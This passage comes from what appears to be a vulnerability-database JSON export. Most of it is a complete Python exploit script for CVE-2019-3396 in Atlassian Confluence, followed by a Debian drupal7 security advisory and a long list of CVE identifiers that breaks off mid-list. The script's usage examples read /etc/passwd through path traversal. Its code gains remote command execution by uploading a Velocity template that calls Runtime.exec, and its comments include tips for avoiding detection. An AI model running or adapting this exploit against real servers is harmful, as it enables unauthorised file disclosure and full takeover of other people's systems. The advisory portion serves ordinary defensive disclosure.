fs /etc\r\n- get content of /etc/passwd on same server but through a proxy\r\n python exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd\r\n- execute 'whoami' command on the same server (this will upload a template file with payload to the server using\r\nexisting session)\r\n python exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\"\r\n\r\nTested on Confluence versions:\r\n 6.12.1\r\n\r\nTo test the exploit:\r\n 1. Download Confluence trial version for version 6.12.1\r\n https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin\r\n (to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser\r\n network tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and\r\n change the version in URL to be 6.12.1)\r\n SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin\r\n 2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and everything by default.\r\n chmod +x atlassian-confluence-6.12.1-x64.bin\r\n sudo ./atlassian-confluence-6.12.1-x64.bin\r\n 3. Open the browser to configure initial installation, when you get to license window copy the server ID.\r\n 4. Create account at https://my.atlassian.com/ and request for new trial license using server ID.\r\n 5. Activate the license and finish the installation with default options.\r\n 6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the\r\n exploit.\r\n 7. Run the exploit (see usage above).\r\n\"\"\"\r\n\r\n__version__ = \"1.0.0\"\r\n__author__ = \"46o60\"\r\n\r\nimport argparse\r\nimport logging\r\nimport requests\r\nimport urllib3\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport json\r\nimport random\r\nimport string\r\n\r\n# script and banner\r\nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\"\r\nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \r\n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \r\n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \r\n \r\n\"\"\"\r\n\r\n# turn off requests log output\r\nurllib3.disable_warnings()\r\nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING)\r\n\r\n\r\ndef print_banner():\r\n \"\"\"\r\n Prints script ASCII banner and basic information.\r\n\r\n Because it is cool.\r\n \"\"\"\r\n print(ASCII_BANNER_TEXT)\r\n print(\"{} v{}\".format(SCRIPT_NAME, __version__))\r\n print(\"Author: {}\".format(__author__))\r\n print()\r\n\r\n\r\ndef exit_log(logger, message):\r\n \"\"\"\r\n Utility function to log exit message and finish the script.\r\n \"\"\"\r\n logger.error(message)\r\n exit(1)\r\n\r\n\r\ndef check_cookie_format(value):\r\n \"\"\"\r\n Checks if value is in format: ^[^=]+=[^=]+$\r\n \"\"\"\r\n pattern = r\"^[^=]+=[^=]+$\"\r\n if not re.match(pattern, value):\r\n raise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\")\r\n return value\r\n\r\n\r\ndef parse_arguments():\r\n \"\"\"\r\n Performs parsing of script arguments.\r\n \"\"\"\r\n # creating parser\r\n parser = argparse.ArgumentParser(\r\n prog=SCRIPT_NAME,\r\n description=\"Exploit CVE-2019-3396 to explore file system or gain RCE through file upload.\"\r\n )\r\n\r\n # general script arguments\r\n parser.add_argument(\r\n \"-V\", \"--version\",\r\n help=\"displays the current version of the script\",\r\n action=\"version\",\r\n version=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__)\r\n )\r\n parser.add_argument(\r\n \"-v\", \"--verbosity\",\r\n help=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\",\r\n action=\"count\",\r\n default=0\r\n )\r\n parser.add_argument(\r\n \"-sb\", \"--skip-banner\",\r\n help=\"skips printing of the banner\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n parser.add_argument(\r\n \"-s\", \"--silent\",\r\n help=\"do not output results of the exploit to standard output\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n parser.add_argument(\r\n \"-q\", \"--quiet\",\r\n help=\"do not output any logs\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n\r\n # arguments for input\r\n parser.add_argument(\r\n \"-px\", \"--proxy\",\r\n help=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\"\r\n )\r\n parser.add_argument(\r\n \"-t\", \"--tls\",\r\n help=\"use HTTPS protocol, default behaviour is to use plain HTTP\",\r\n action=\"store_true\"\r\n )\r\n parser.add_argument(\r\n \"-th\", \"--target-host\",\r\n help=\"target hostname/domain\",\r\n required=True\r\n )\r\n parser.add_argument(\r\n \"-p\", \"--port\",\r\n help=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\"\r\n )\r\n\r\n # two different sub commands\r\n subparsers = parser.add_subparsers(\r\n title=\"actions\",\r\n description=\"different behaviours of the script\",\r\n help=\"for detail description of available action options invoke -h for each individual action\",\r\n dest=\"action\"\r\n )\r\n\r\n # only exploring file system by disclosure of files and directories\r\n parser_file_system = subparsers.add_parser(\r\n \"fs\",\r\n help=\"use the exploit to browse local file system on the target endpoint\"\r\n )\r\n parser_file_system.add_argument(\r\n \"path\",\r\n help=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\"\r\n )\r\n parser_file_system.set_defaults(func=exploit_path_traversal)\r\n\r\n # using file upload to deploy payload and achieve RCE\r\n parser_rce = subparsers.add_parser(\r\n \"rce\",\r\n help=\"use the exploit to upload a template \"\r\n )\r\n parser_rce.add_argument(\r\n \"-hd\", \"--home-directory\",\r\n help=\"Confluence home directory on the server\"\r\n )\r\n parser_rce.add_argument(\r\n \"-c\", \"--cookie\",\r\n help=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \"\r\n \"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\",\r\n type=check_cookie_format,\r\n required=True\r\n )\r\n parser_rce.add_argument(\r\n \"command\",\r\n help=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\"\r\n )\r\n parser_rce.set_defaults(func=exploit_rce)\r\n\r\n # parsing\r\n arguments = parser.parse_args()\r\n\r\n return arguments\r\n\r\n\r\nclass Configuration:\r\n \"\"\"\r\n Represents all supported configuration items.\r\n \"\"\"\r\n\r\n # Parse arguments and set all configuration variables\r\n def __init__(self, script_args):\r\n self.script_arguments = script_args\r\n\r\n # setting input arguments\r\n self._proxy = self.script_arguments.proxy\r\n self._target_protocol = \"https\" if self.script_arguments.tls else \"http\"\r\n self._target_host = self.script_arguments.target_host\r\n self._target_port = self.script_arguments.port if self.script_arguments.port else \\\r\n 443 if self.script_arguments.tls else 80\r\n\r\n @staticmethod\r\n def get_logger(verbosity):\r\n \"\"\"\r\n Prepares logger to output to stdout with appropriate verbosity.\r\n \"\"\"\r\n logger = logging.getLogger()\r\n # default logging level\r\n logger.setLevel(logging.DEBUG)\r\n\r\n # Definition of logging to console\r\n ch = logging.StreamHandler()\r\n # specific logging level for console\r\n if verbosity == 0:\r\n ch.setLevel(logging.INFO)\r\n elif verbosity > 0:\r\n ch.setLevel(logging.DEBUG)\r\n\r\n # formatting\r\n class MyFormatter(logging.Formatter):\r\n\r\n default_fmt = logging.Formatter('[?] %(message)s')\r\n info_fmt = logging.Formatter('[+] %(message)s')\r\n error_fmt = logging.Formatter('[-] %(message)s')\r\n warning_fmt = logging.Formatter('[!] %(message)s')\r\n debug_fmt = logging.Formatter('>>> %(message)s')\r\n\r\n def format(self, record):\r\n if record.levelno == logging.INFO:\r\n return self.info_fmt.format(record)\r\n elif record.levelno == logging.ERROR:\r\n return self.error_fmt.format(record)\r\n elif record.levelno == logging.WARNING:\r\n return self.warning_fmt.format(record)\r\n elif record.levelno == logging.DEBUG:\r\n return self.debug_fmt.format(record)\r\n else:\r\n return self.default_fmt.format(record)\r\n\r\n ch.setFormatter(MyFormatter())\r\n\r\n # adding handler\r\n logger.addHandler(ch)\r\n\r\n return logger\r\n\r\n # Properties\r\n @property\r\n def endpoint(self):\r\n if not self._target_protocol or not self._target_host or not self._target_port:\r\n exit_log(log, \"failed to generate endpoint URL\")\r\n return f\"{self._target_protocol}://{self._target_host}:{self._target_port}\"\r\n\r\n @property\r\n def remote_path(self):\r\n return self.script_arguments.path\r\n\r\n @property\r\n def attachment_dir(self):\r\n home_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \\\r\n Exploit.DEFAULT_CONFLUENCE_INSTALL_DIR\r\n return f\"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}\"\r\n\r\n @property\r\n def rce_command(self):\r\n return self.script_arguments.command\r\n\r\n @property\r\n def session_cookie(self):\r\n if not self.script_arguments.cookie:\r\n return None\r\n parts = self.script_arguments.cookie.split(\"=\")\r\n return {\r\n parts[0]: parts[1]\r\n }\r\n\r\n @property\r\n def proxies(self):\r\n return {\r\n \"http\": self._proxy,\r\n \"https\": self._proxy\r\n }\r\n\r\n\r\nclass Exploit:\r\n \"\"\"\r\n This class represents actual exploit towards the target Confluence server.\r\n \"\"\"\r\n # used for both path traversal and RCE\r\n DEFAULT_VULNERABLE_ENDPOINT = \"/rest/tinymce/1/macro/preview\"\r\n\r\n # used only for RCE\r\n CREATE_PERSONAL_SPACE_PATH = \"/rest/create-dialog/1.0/space-blueprint/create-personal-space\"\r\n PERSONAL_SPACE_KEY_PATH = \"/index.action\"\r\n PERSONAL_SPACE_KEY_REGEX = r\"^/spaces/viewspace\\.action\\?key=(.*?)$\"\r\n PERSONAL_SPACE_ID_PATH = \"/rest/api/space\"\r\n PERSONAL_SPACE_KEY_PARAMETER_NAME = \"spaceKey\"\r\n HOMEPAGE_REGEX = r\"/rest/api/content/([0-9]+)$\"\r\n ATL_TOKEN_PATH = \"/pages/viewpageattachments.action\"\r\n FILE_UPLOAD_PATH = \"/pages/doattachfile.action\"\r\n # file name has no real significance, file is identified on file system by it's ID\r\n # (change only if you want to avoid detection)\r\n DEFAULT_UPLOADED_FILE_NAME = \"payload_{}.vm\".format(\r\n ''.join(random.choice(string.ascii_lowercase) for i in range(5))\r\n ) # the extension .vm is not really needed, remove it if you have problems uploading the template\r\n DEFAULT_CONFLUENCE_INSTALL_DIR = \"/var/atlassian/application-data/confluence\"\r\n DEFAULT_CONFLUENCE_ATTACHMENT_PATH = \"/attachments/ver003\"\r\n # using random name for uploaded file so it will always be first version of the file\r\n DEFAULT_FILE_VERSION = \"1\"\r\n\r\n def __init__(self, config):\r\n \"\"\"\r\n Runs the exploit towards target_url.\r\n \"\"\"\r\n self._config = config\r\n\r\n self._target_url = f\"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}\"\r\n\r\n if self._config.script_arguments.action == \"rce\":\r\n self._root_url = f\"{self._config.endpoint}/\"\r\n self._create_personal_space_url = f\"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}\"\r\n self._personal_space_key_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}\"\r\n\r\n # Following data will be dynamically created while exploit is running\r\n self._space_key = None\r\n self._personal_space_id_url = None\r\n self._space_id = None\r\n self._homepage_id = None\r\n self._atl_token_url = None\r\n self._atl_token = None\r\n self._upload_url = None\r\n self._file_id = None\r\n\r\n def generate_payload_location(self):\r\n \"\"\"\r\n Generates location on file system for uploaded attachment based on Confluence Ver003 scheme.\r\n\r\n See more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html\r\n \"\"\"\r\n if not self._space_id or not self._homepage_id or not self._file_id:\r\n exit_log(log, \"cannot generate payload location without space, homepage and file ID\")\r\n\r\n space_folder_one = str(int(self._space_id[-3:]) % 250)\r\n space_folder_two = str(int(self._space_id[-6:-3]) % 250)\r\n space_folder_three = self._space_id\r\n page_folder_one = str(int(self._homepage_id[-3:]) % 250)\r\n page_folder_two = str(int(self._homepage_id[-6:-3]) % 250)\r\n page_folder_three = self._homepage_id\r\n file_folder = self._file_id\r\n version = Exploit.DEFAULT_FILE_VERSION\r\n\r\n payload_location = f\"{self._config.attachment_dir}/\" \\\r\n f\"{space_folder_one}/{space_folder_two}/{space_folder_three}/\"\\\r\n f\"{page_folder_one}/{page_folder_two}/{page_folder_three}/\" \\\r\n f\"{file_folder}/{version}\"\r\n log.debug(f\"generated payload location: {payload_location}\")\r\n\r\n return payload_location\r\n\r\n def path_traversal(self, target_remote_path, decode_output=False):\r\n \"\"\"\r\n Uses vulnerability in _template parameter to achieve path traversal.\r\n\r\n Args:\r\n target_remote_path (string): path on local file system of the target application\r\n decode_output (bool): set to True if output of the file will be character codes separated by new lines,\r\n used with RCE\r\n \"\"\"\r\n post_data = {\r\n \"contentId\": str(random.randint(1, 10000)),\r\n \"macro\": {\r\n \"body\": \"\",\r\n \"name\": \"widget\",\r\n \"params\": {\r\n \"_template\": f\"file://{target_remote_path}\",\r\n \"url\": \"https://www.youtube.com/watch?v=\" + ''.join(random.choice(\r\n string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11))\r\n }\r\n }\r\n }\r\n\r\n log.info(\"sending request towards vulnerable endpoint with payload in '_template' parameter\")\r\n response = requests.post(\r\n self._target_url,\r\n headers={\r\n \"Content-Type\": \"application/json; charset=utf-8\"\r\n },\r\n json=post_data,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"exploit failed\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n # if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve\r\n # the requested path\r\n error_element = soup.find_all(\"div\", \"widget-error\")\r\n if error_element:\r\n log.warning(\"failed to retrieve target path on the system\")\r\n log.warning(\"target path does not exist or application does not have appropriate permissions to view it\")\r\n return \"\"\r\n else:\r\n # otherwise parse out the actual response (file content or directory listing)\r\n output_element = soup.find_all(\"div\", \"wiki-content\")\r\n\r\n if not output_element:\r\n exit_log(log, \"application did not return appropriate HTML element\")\r\n if not len(output_element) == 1:\r\n log.warning(\"application unexpectedly returned multiple HTML elements, using the first one\")\r\n output_element = output_element[0]\r\n\r\n log.debug(\"extracting HTML element value and stripping the leading and trailing spaces\")\r\n # output = output_element.string.strip()\r\n output = output_element.decode_contents().strip()\r\n\r\n if \"The macro 'widget' is unknown. It may have been removed from the system.\" in output:\r\n exit_log(log, \"widget seems to be disabled on system, target most likely is not vulnerable\")\r\n\r\n if not self._config.script_arguments.silent:\r\n if decode_output:\r\n parsed_output = \"\"\r\n p = re.compile(r\"^([0-9]+)\")\r\n for line in output.split(\"\\n\"):\r\n r = p.match(line)\r\n if r:\r\n parsed_output += chr(int(r.group(1)))\r\n print(parsed_output.strip())\r\n else:\r\n print(output)\r\n\r\n return output\r\n\r\n def find_personal_space_key(self):\r\n \"\"\"\r\n Makes request that will return personal space key in the response.\r\n \"\"\"\r\n log.debug(\"checking if user has personal space\")\r\n response = requests.get(\r\n self._root_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n )\r\n page_content = response.text\r\n if \"Add personal space\" in page_content:\r\n log.info(f\"user does not have personal space, creating it now...\")\r\n\r\n response = requests.post(\r\n self._create_personal_space_url,\r\n headers={\r\n \"Content-Type\": \"application/json\"\r\n },\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n json={\r\n \"spaceUserKey\": \"\"\r\n }\r\n )\r\n\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to create personal space\")\r\n\r\n log.debug(f\"personal space created\")\r\n response_data = response.json()\r\n self._space_key = response_data.get(\"key\")\r\n else:\r\n log.info(\"sending request to find personal space key\")\r\n response = requests.get(\r\n self._personal_space_key_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n personal_space_link_element = soup.find(\"a\", id=\"view-personal-space-link\")\r\n if not personal_space_link_element or not personal_space_link_element.has_attr(\"href\"):\r\n exit_log(log, \"failed to find personal space link in the response, does the user have personal space?\")\r\n path = personal_space_link_element[\"href\"]\r\n p = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX)\r\n r = p.match(path)\r\n if r:\r\n self._space_key = r.group(1)\r\n else:\r\n exit_log(log, \"failed to find personal space key\")\r\n\r\n log.debug(f\"personal space key: {self._space_key}\")\r\n self._personal_space_id_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?\" \\\r\n f\"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}\"\r\n log.debug(f\"generated personal space id url: {self._personal_space_id_url}\")\r\n\r\n def find_personal_space_id_and_homepage_id(self):\r\n \"\"\"\r\n Makes request that will return personal space ID and homepage ID in the response.\r\n \"\"\"\r\n if self._personal_space_id_url is None:\r\n exit_log(log, f\"personal space id url is missing, did you call exploit functions in correct order?\")\r\n\r\n log.info(\"sending request to find personal space ID and homepage\")\r\n response = requests.get(\r\n self._personal_space_id_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is JSON\r\n data = json.loads(page_content)\r\n\r\n if \"results\" not in data:\r\n exit_log(log, \"failed to find 'result' section in json output\")\r\n items = data[\"results\"]\r\n if type(items) is not list or len(items) == 0:\r\n exit_log(log, \"no results for personal space id\")\r\n personal_space_data = items[0]\r\n if \"id\" not in personal_space_data:\r\n exit_log(log, \"failed to find ID in personal space data\")\r\n self._space_id = str(personal_space_data[\"id\"])\r\n log.debug(f\"found space id: {self._space_id}\")\r\n if \"_expandable\" not in personal_space_data:\r\n exit_log(log, \"failed to find '_expandable' section in personal space data\")\r\n personal_space_expandable_data = personal_space_data[\"_expandable\"]\r\n if \"homepage\" not in personal_space_expandable_data:\r\n exit_log(log, \"failed to find homepage in personal space expandable data\")\r\n homepage_path = personal_space_expandable_data[\"homepage\"]\r\n p = re.compile(Exploit.HOMEPAGE_REGEX)\r\n r = p.match(homepage_path)\r\n if r:\r\n self._homepage_id = r.group(1)\r\n log.debug(f\"found homepage id: {self._homepage_id}\")\r\n self._atl_token_url = f\"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}\"\r\n log.debug(f\"generated atl token url: {self._atl_token_url}\")\r\n self._upload_url = f\"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}\"\r\n log.debug(f\"generated upload url: {self._upload_url}\")\r\n else:\r\n exit_log(log, \"failed to find homepage id, homepage path has incorrect format\")\r\n\r\n def get_csrf_token(self):\r\n \"\"\"\r\n Makes request to get the current CSRF token for the session.\r\n \"\"\"\r\n if self._atl_token_url is None:\r\n exit_log(log, f\"atl token url is missing, did you call exploit functions in correct order?\")\r\n\r\n log.info(\"sending request to find CSRF token\")\r\n response = requests.get(\r\n self._atl_token_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n atl_token_element = soup.find(\"input\", {\"name\": \"atl_token\"})\r\n if not atl_token_element.has_attr(\"value\"):\r\n exit_log(log, \"failed to find value for atl_token\")\r\n self._atl_token = atl_token_element[\"value\"]\r\n log.debug(f\"found CSRF token: {self._atl_token}\")\r\n\r\n def upload_template(self):\r\n \"\"\"\r\n Makes multipart request to upload the template file to the server.\r\n \"\"\"\r\n log.info(\"uploading template to server\")\r\n if not self._atl_token:\r\n exit_log(log, \"cannot upload a file without CSRF token\")\r\n if self._upload_url is None:\r\n exit_log(log, f\"upload url is missing, did you call exploit functions in correct order?\")\r\n\r\n # Velocity template here executes command and then captures the output. Here the output is generated by printing\r\n # character codes one by one in each line. This can be improved for sure but did not have time to investigate\r\n # why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern\r\n # webapp' was not working properly. This gets decoded on our python client later.\r\n template = f\"\"\"#set( $test = \"test\" )\r\n#set($ex = $test.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"{self._config.script_arguments.command}\"))\r\n#set($exout = $ex.waitFor())\r\n#set($out = $ex.getInputStream())\r\n#foreach($i in [1..$out.available()])\r\n#set($ch = $out.read())\r\n$ch\r\n#end\"\"\"\r\n\r\n log.debug(f\"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}\")\r\n parts = {\r\n \"atl_token\": (None, self._atl_token),\r\n \"file_0\": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template),\r\n \"confirm\": \"Attach\"\r\n }\r\n response = requests.post(\r\n self._upload_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n files=parts\r\n )\r\n\r\n # for successful upload first a 302 response needs to happen then 200 page is returned with file ID\r\n if response.status_code == 403:\r\n exit_log(log, \"got 403, probably problem with CSRF token\")\r\n if not len(response.history) == 1 or not response.history[0].status_code == 302:\r\n exit_log(log, \"failed to upload the payload\")\r\n\r\n page_content = response.content\r\n\r\n if \"Upload Failed\" in str(page_content):\r\n exit_log(log, \"failed to upload template\")\r\n\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n file_link_element = soup.find(\"a\", \"filename\", {\"title\": Exploit.DEFAULT_UPLOADED_FILE_NAME})\r\n if not file_link_element.has_attr(\"data-linked-resource-id\"):\r\n exit_log(log, \"failed to find data-linked-resource-id attribute (file ID) for uploaded file link\")\r\n self._file_id = file_link_element[\"data-linked-resource-id\"]\r\n log.debug(f\"found file ID: {self._file_id}\")\r\n\r\n\r\ndef exploit_path_traversal(config):\r\n \"\"\"\r\n This sends one request towards vulnerable server to either get local file content or directory listing.\r\n \"\"\"\r\n log.debug(\"running path traversal exploit\")\r\n\r\n exploit = Exploit(config)\r\n exploit.path_traversal(config.remote_path)\r\n\r\n\r\ndef exploit_rce(config):\r\n \"\"\"This executes multiple steps to gain RCE. Requires a session token.\r\n\r\n Steps:\r\n 1. find personal space key for the user\r\n 2. find personal space ID and homepage ID for the user\r\n 3. get CSRF token (generated per session)\r\n 4. upload template file with Java code (involves two requests, first one is 302 redirection)\r\n 5. use path traversal part of exploit to load and execute local template file\r\n 6. profit\r\n \"\"\"\r\n log.debug(\"running RCE exploit\")\r\n\r\n exploit = Exploit(config)\r\n exploit.find_personal_space_key()\r\n exploit.find_personal_space_id_and_homepage_id()\r\n exploit.get_csrf_token()\r\n exploit.upload_template()\r\n payload_location = exploit.generate_payload_location()\r\n exploit.path_traversal(payload_location, decode_output=True)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # parse arguments and load all configuration items\r\n script_arguments = parse_arguments()\r\n log = Configuration.get_logger(script_arguments.verbosity)\r\n\r\n configuration = Configuration(script_arguments)\r\n\r\n # printing banner\r\n if not configuration.script_arguments.skip_banner:\r\n print_banner()\r\n\r\n if script_arguments.quiet:\r\n log.disabled = True\r\n\r\n log.debug(\"finished parsing CLI arguments\")\r\n log.debug(\"configuration was loaded successfully\")\r\n log.debug(\"starting exploit\")\r\n\r\n # disabling warning about trusting self sign certificate from python requests\r\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\n # run appropriate function depending on mode\r\n configuration.script_arguments.func(configuration)\r\n\r\n log.debug(\"done!\")", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49465"}], "debian": [{"lastseen": "2021-01-22T01:17:45", "bulletinFamily": "unix", "cvelist": ["CVE-2020-36193"], "description": "- -----------------------------------------------------------------------\nDebian LTS Advisory DLA-2530-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Gunnar Wolf\nJanuary 21, 2021 https://wiki.debian.org/LTS\n- -----------------------------------------------------------------------\n\nPackage : drupal7\nVersion : 7.52-2+deb9u14\nCVE ID : CVE-2020-36193\n\nDrupal identified a vulnerability in the verson of the Archive_Tar\nlibrary it bundles (CVE-2020-36193), which allows out-of-path\nextraction vulnerabilities, granting it the Drupal Security Advisory\nID SA-CORE-2021-001:\n\n https://www.drupal.org/sa-core-2021-001\n\nFor Debian 9 &quot;Stretch&quot;, the fix to this issue was backported in\nversion 7.52-2+deb9u14.\n\nWe recommend you upgrade your drupal7 package.\n\nFor detailed security status of drupal7, please refer to its security\ntracker page:\n\n https://security-tracker.debian.org/tracker/source-package/drupal7\n\nFurther information about Debian LTS security advisories, how to\napply these updates to your system, and other frequently asked\nquestions can be found at:\n\n https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-01-21T20:00:49", "published": "2021-01-21T20:00:49", "id": "DEBIAN:DLA-2530-1:90DEF", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202101/msg00018.html", "title": "[SECURITY] [DLA-2530-1] drupal7 security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}], "mscve": [{"lastseen": "2021-01-22T21:32:36", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-6408", "CVE-2021-21108", "CVE-2021-21114", "CVE-2020-16024", "CVE-2020-6409", "CVE-2020-16043", "CVE-2020-6548", "CVE-2020-6518", "CVE-2020-6464", "CVE-2020-16026", "CVE-2020-15965", "CVE-2020-16012", "CVE-2020-16000", "CVE-2020-6395", "CVE-2020-6569", "CVE-2020-6445", "CVE-2020-6454", "CVE-2020-6381", "CVE-2020-16011", "CVE-2020-15979", "CVE-2020-6428", "CVE-2020-6564", "CVE-2020-6424", "CVE-2020-6446", "CVE-2020-6458", "CVE-2020-6394", "CVE-2020-6397", "CVE-2020-15962", "CVE-2020-6506", "CVE-2020-6468", "CVE-2020-6831", "CVE-2020-15969", "CVE-2020-16007", "CVE-2020-6570", "CVE-2020-6533", "CVE-2020-6434", "CVE-2020-16032", "CVE-2020-6561", "CVE-2020-6432", "CVE-2020-6540", "CVE-2020-6559", "CVE-2020-6447", "CVE-2020-6545", "CVE-2020-6554", "CVE-2020-6566", "CVE-2020-1341", "CVE-2020-6399", "CVE-2020-6452", "CVE-2020-6483", "CVE-2020-6392", "CVE-2020-6387", "CVE-2020-6482", "CVE-2020-6528", "CVE-2020-6563", "CVE-2020-16031", "CVE-2020-15974", "CVE-2020-16030", "CVE-2020-16039", "CVE-2020-6486", "CVE-2020-6412", "CVE-2020-15960", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6407", "CVE-2020-6494", "CVE-2020-6547", "CVE-2020-6529", "CVE-2020-6476", "CVE-2021-21116", "CVE-2020-15999", "CVE-2020-6507", "CVE-2020-6537", "CVE-2020-6416", "CVE-2020-6410", "CVE-2020-6460", "CVE-2020-6560", "CVE-2020-16027", "CVE-2020-16009", "CVE-2020-6461", "CVE-2021-21107", "CVE-2020-6574", "CVE-2020-6479", "CVE-2020-6511", "CVE-2020-6568", "CVE-2020-6386", "CVE-2020-6459", "CVE-2020-15982", "CVE-2020-6542", "CVE-2020-15968", "CVE-2020-6396", "CVE-2020-16002", "CVE-2020-6474", "CVE-2020-6467", "CVE-2020-6383", "CVE-2020-15975", "CVE-2020-6465", "CVE-2020-15985", "CVE-2020-6538", "CVE-2020-6493", "CVE-2020-6550", "CVE-2020-16001", "CVE-2020-6534", "CVE-2020-16023", "CVE-2020-16042", "CVE-2020-16029", "CVE-2020-6437", "CVE-2020-6444", "CVE-2020-15989", "CVE-2020-6451", "CVE-2020-6532", "CVE-2020-6521", "CVE-2021-21109", "CVE-2020-6429", "CVE-2020-6427", "CVE-2020-6536", "CVE-2020-6439", "CVE-2020-15972", "CVE-2020-6385", "CVE-2020-16005", "CVE-2020-6401", "CVE-2019-19926", "CVE-2020-15966", "CVE-2020-16004", "CVE-2020-6535", "CVE-2019-19925", "CVE-2020-16008", "CVE-2020-6455", "CVE-2020-6571", "CVE-2020-6519", "CVE-2020-6414", "CVE-2020-6391", "CVE-2020-6472", "CVE-2020-16016", "CVE-2020-6420", "CVE-2020-6417", "CVE-2020-16041", "CVE-2020-6530", "CVE-2020-6481", "CVE-2020-6431", "CVE-2020-6520", "CVE-2020-6411", "CVE-2021-21106", "CVE-2020-6522", "CVE-2019-19880", "CVE-2020-15963", "CVE-2020-6422", "CVE-2020-16040", "CVE-2020-16034", "CVE-2020-15964", "CVE-2020-6400", "CVE-2020-6398", "CVE-2020-6388", "CVE-2020-6413", "CVE-2020-6555", "CVE-2020-6448", "CVE-2020-6426", "CVE-2020-15973", "CVE-2020-16022", "CVE-2020-15987", "CVE-2021-21112", "CVE-2020-15995", "CVE-2020-15971", "CVE-2019-8075", "CVE-2020-6469", "CVE-2020-6512", "CVE-2020-6449", "CVE-2020-15991", "CVE-2020-6435", "CVE-2020-6489", "CVE-2019-18197", "CVE-2020-6456", "CVE-2020-6567", "CVE-2020-16033", "CVE-2020-6514", "CVE-2019-19923", "CVE-2020-6576", "CVE-2020-6473", 